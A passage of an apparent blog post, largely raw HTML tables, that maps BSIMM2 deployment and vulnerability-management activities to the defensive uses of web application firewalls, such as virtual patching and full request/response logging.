margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: 
rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se2.3#se2.3" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">SE2.3</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se2.3#se2.3" style="color: rgb(16, 30, 171); display: block; width: 378px; text-decoration: none; ">watch software</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se2.3#se2.3" style="color: rgb(16, 30, 171); display: block; width: 278px; text-decoration: none; ">use application behavior monitoring and diagnostics</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td 
style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se2.4#se2.4" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">SE2.4</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se2.4#se2.4" style="color: rgb(16, 30, 171); display: block; width: 378px; text-decoration: none; ">protect apps (or parts of apps) that are published over trust boundaries</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a 
href="http://bsimm2.com/online/deployment/se/?s=se2.4#se2.4" style="color: rgb(16, 30, 171); display: block; width: 278px; text-decoration: none; ">use code signing</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se3.2#se3.2" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">SE3.2</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se3.2#se3.2" style="color: rgb(16, 30, 171); display: block; width: 378px; text-decoration: none; ">protect IP and make exploit development harder</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); 
border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se3.2#se3.2" style="color: rgb(16, 30, 171); display: block; width: 278px; text-decoration: none; ">use code protection</a></td><td rowspan="1" valign="top" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?l=3#3" style="color: rgb(16, 30, 171); display: block; width: 31px; text-decoration: none; ">3</a><div><br /></div></td></tr></tbody></table></span></div><div>Specifically, items SE1.1 and SE2.3 which specify the need to "watch software" in order to conduct application input monitoring and behavioral analysis are items where a WAF's automated learning/profiling can identify when there are deviations from normal user or application behavior.</div><div><br /></div><div>The <a href="http://bsimm2.com/online/deployment/cmvm/">Deployment: Configuration Management and Vulnerability Managemen</a>t section lists the following criteria:</div><div><br /></div><div><span class="Apple-style-span" style=" line-height: 20px; font-family:Cambria, 'Hoefler Text', Utopia, 'Liberation Serif', 'Nimbus Roman No9 L Regular', Times, 'Times New Roman', serif;font-size:15px;"><table cellspacing="0" cellpadding="0" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; 
border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(102, 102, 102); border-right-color: rgb(102, 102, 102); border-bottom-color: rgb(102, 102, 102); border-left-color: rgb(102, 102, 102); width: 754px; margin-top: auto; margin-right: auto; margin-bottom: 25px; margin-left: auto; "><tbody><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><th colspan="4" style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">DEPLOYMENT: CONFIGURATION MANAGEMENT AND VULNERABILITY MANAGEMENT<br />Patching and updating applications, version control, defect tracking and remediation, incident handling.</th></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); "> </th><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 
170); ">Objective</th><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">Activity</th><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">Level</th></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm1.1#cmvm1.1" style="color: rgb(16, 30, 171); display: block; width: 60px; text-decoration: none; ">CMVM1.1</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); 
border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm1.1#cmvm1.1" style="color: rgb(16, 30, 171); display: block; width: 251px; text-decoration: none; ">know what to do when something bad happens</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm1.1#cmvm1.1" style="color: rgb(16, 30, 171); display: block; width: 380px; text-decoration: none; ">create/interface with incident response</a></td><td rowspan="2" valign="top" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?l=1#1" style="color: rgb(16, 30, 171); display: block; width: 31px; text-decoration: none; ">1</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; 
border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm1.2#cmvm1.2" style="color: rgb(16, 30, 171); display: block; width: 60px; text-decoration: none; ">CMVM1.2</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm1.2#cmvm1.2" style="color: rgb(16, 30, 171); display: block; width: 251px; text-decoration: none; ">use ops data to change dev behavior</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm1.2#cmvm1.2" style="color: rgb(16, 30, 171); 
display: block; width: 380px; text-decoration: none; ">identify software bugs found in ops monitoring and feed back to dev</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm2.1#cmvm2.1" style="color: rgb(16, 30, 171); display: block; width: 60px; text-decoration: none; ">CMVM2.1</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm2.1#cmvm2.1" style="color: rgb(16, 30, 171); display: block; width: 251px; text-decoration: none; ">be able to fix apps when they are under direct attack</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 
170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm2.1#cmvm2.1" style="color: rgb(16, 30, 171); display: block; width: 380px; text-decoration: none; ">have emergency codebase response</a></td><td rowspan="3" valign="top" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?l=2#2" style="color: rgb(16, 30, 171); display: block; width: 31px; text-decoration: none; ">2</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm2.2#cmvm2.2" style="color: rgb(16, 30, 171); display: block; width: 60px; text-decoration: none; ">CMVM2.2</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 
1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm2.2#cmvm2.2" style="color: rgb(16, 30, 171); display: block; width: 251px; text-decoration: none; ">use ops data to change dev behavior</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm2.2#cmvm2.2" style="color: rgb(16, 30, 171); display: block; width: 380px; text-decoration: none; ">track software bugs found during ops through the fix process</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a 
href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm2.3#cmvm2.3" style="color: rgb(16, 30, 171); display: block; width: 60px; text-decoration: none; ">CMVM2.3</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm2.3#cmvm2.3" style="color: rgb(16, 30, 171); display: block; width: 251px; text-decoration: none; ">know where the code is</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm2.3#cmvm2.3" style="color: rgb(16, 30, 171); display: block; width: 380px; text-decoration: none; ">develop operations inventory of apps</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); 
border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm3.1#cmvm3.1" style="color: rgb(16, 30, 171); display: block; width: 60px; text-decoration: none; ">CMVM3.1</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm3.1#cmvm3.1" style="color: rgb(16, 30, 171); display: block; width: 251px; text-decoration: none; ">learn from operational experience</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm3.1#cmvm3.1" style="color: rgb(16, 30, 171); display: block; width: 380px; text-decoration: none; ">fix all occurrences of software bugs from ops in the codebase (T: code review)</a></td><td rowspan="2" valign="top" style="border-top-width: 1px; border-right-width: 1px; 
border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?l=3#3" style="color: rgb(16, 30, 171); display: block; width: 31px; text-decoration: none; ">3</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm3.2#cmvm3.2" style="color: rgb(16, 30, 171); display: block; width: 60px; text-decoration: none; ">CMVM3.2</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a 
href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm3.2#cmvm3.2" style="color: rgb(16, 30, 171); display: block; width: 251px; text-decoration: none; ">use ops data to change dev behavior</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/cmvm/?s=cmvm3.2#cmvm3.2" style="color: rgb(16, 30, 171); display: block; width: 380px; text-decoration: none; ">enhance dev processes (SSDL) to prevent cause of software bugs found in ops</a><div><br /></div></td></tr></tbody></table></span></div><div>This section highlights a number of critical deployment components where WAFs help an organization.</div><div><ul><li><b>CMVM2.1 - Be able to fix apps when they are under direct attack</b></li></ul></div><div>Being able to implement a quick response to mitigate a live attack is critical. Even if an organization has direct access to source code and developers, the process of getting fixes into production still takes a fair amount of time. WAFs can be used to quickly implement new policy settings to protect against these attacks until the source code fixes are live. Most people think of virtual patching here, but this capability also extends to other types of attacks, such as denial of service and brute force attacks.</div><div><ul><li><b>CMVM3.2 - Use ops data to change dev behavior</b></li></ul></div><div>Being able to capture the full request/response payloads when either attacks or application errors are identified is vitally important. 
The fact is that most web server and application logging is terrible and only records a small subset of the actual data. Most logs do not record the full inbound request headers and body payloads, and almost none log the outbound data. This data is critical, not only for incident response to identify what data was leaked, but also for remediation efforts. I mean c'mon, how can we really expect web application developers to properly correct application defects when all they are given is a one-line web server log entry in Common Log Format? That is just not enough data for them to recreate and test the payloads needed to correct the issue.</div><div><br /></div><div><b>SSDL Touchpoints: Security Testing</b></div><div>The <a href="http://bsimm2.com/online/ssdl/st/">Security Testing</a> section of BSIMM2 outlines the following:</div><div><br /></div><div><span class="Apple-style-span" style=" line-height: 20px; font-family:Cambria, 'Hoefler Text', Utopia, 'Liberation Serif', 'Nimbus Roman No9 L Regular', Times, 'Times New Roman', serif;font-size:15px;"><table cellspacing="0" cellpadding="0" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(102, 102, 102); border-right-color: rgb(102, 102, 102); border-bottom-color: rgb(102, 102, 102); border-left-color: rgb(102, 102, 102); width: 754px; margin-top: auto; margin-right: auto; margin-bottom: 25px; margin-left: auto; "><tbody><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><th colspan="4" style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); 
border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">SSDL TOUCHPOINTS: SECURITY TESTING<br />Use of black box security tools in QA, risk driven white box testing, application of the attack model, code coverage analysis.</th></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); "> </th><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">Objective</th><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">Activity</th><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; 